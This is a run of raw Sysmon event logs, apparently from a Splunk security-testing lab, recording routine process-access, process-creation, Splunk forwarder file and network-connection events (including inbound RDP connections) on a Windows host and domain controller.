11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-14D3-6216-C104-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14D3-6216-C104-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.207{4F8D34B0-14D3-6216-C104-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:48.297{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56473-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:52.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32087DAF66CB1EEF1399A11D45FB449D,SHA256=939DCF10FA61AEBF743FB47D323EFF34A259519B07A6E993540DB71F3848AE9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:52.472{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEB5736A4FD6BE97B8BCD3CDB49C8721,SHA256=B369FC941A50FBDED762BBD40533909CC9961AAE2761D7EE12F7FC6D72CCCAC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:50.526{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60750- 23542300x8000000000000000219251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:52.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63616E1C9DBC795594CFD7FE597522BC,SHA256=B4F522188E3102CA1EE341B040761976AF689DB13633A35B8D32C0E59762C668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:53.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C427DF7700C1EF0BF4EBFD14A02DF51,SHA256=8D08F0794FB1A9E04D22E2D02051D24144F1F587FB73B0F76CFACDBF4A53CCDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:53.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBDC5E20B9F3B14B96AC65E82BFCD907,SHA256=72B885078C77F083EE3C66E51F5EB123DCE8301CD01D58012509A1E9DD3095BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:53.359{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:53.359{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:53.359{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:54.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88F8196BF19082791B6A625246D99FB,SHA256=CCD600CA541F347D3DD231662DC00BDDDE0EFE669F475CAD1C16E8F76CDC9142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:54.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6964AF323F2B3143A627C3CA7F941673,SHA256=328C859A23AEA3DAD4D82CB8B7D804BF9AECBADB8E8C0DAEA0431E1FE25CB0AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:54.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DDF9F25139158ED87A77C49D29330A3,SHA256=EB2A11B73011BB39D26E77BAB83799FCBEAD2C252EC90E3CCAAFC62912A0B7D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.841{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx60955-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51507-false10.0.1.12-8000- 23542300x8000000000000000295026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:55.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ADE4C3E703E2C4045397A2A5A4925FB,SHA256=DC1F003F3984B7B9B0E862AB5AAA8F3EBC0864807BB28325ECCFB37A1B26A75C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:55.534{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1E4368E7331C0B3FAD6A466435E7E0D,SHA256=F4FE4A9CAA6944AFD967E4C10C789A9DB67C55ADB84B0B0F266E99823183CC38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:53.532{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49198-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:56.692{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCA3E15DEEF6F7EC1CD304AF2C5749EB,SHA256=64BB1C97F6D5A1EAB128C628923D21A36C3928248507F1EA2CD7C18EF2B09D1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:56.534{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D530CECD10E2732D154C2EDAA55CC8E,SHA256=C9DD805A0974C70550E5EAF9E79941B2DBBC68DE42FC61A10CE817FA59E10295,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:57.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A006B13BD0299DDA6AE7568E5E76FF5E,SHA256=7E6B6FA35DFC2A3DCD98A827C5FF441BD563FE23E46BC10AC114154F2A55E6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:57.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=457E3895355FB9CD6051AC7E26A93343,SHA256=ADD8A8D9BE601C637B82B82E909DCE332A19CE830EAA1B91016822A55B7A0DBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:58.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=564EBC04C24716E108625436D690DB33,SHA256=E87B8284D56F850C142654A1F716DC429111946649A8C9B07E339805C88870DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:58.565{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA935C5AF49EF929A8F3BE5BBF70BD3D,SHA256=D0F696F1608897A2172CBED83AB033F15BCF5EA3C05BDA25EEB7480653F74C4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:58.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81161C57CB0B8D0998EA5348BDDB5FC9,SHA256=C6978A7B0FB0327A7A84F7EA1126AFAB8E22BCD6C221DA9AFCD2DEAFDD74D329,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:55.330{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56217-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000295034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 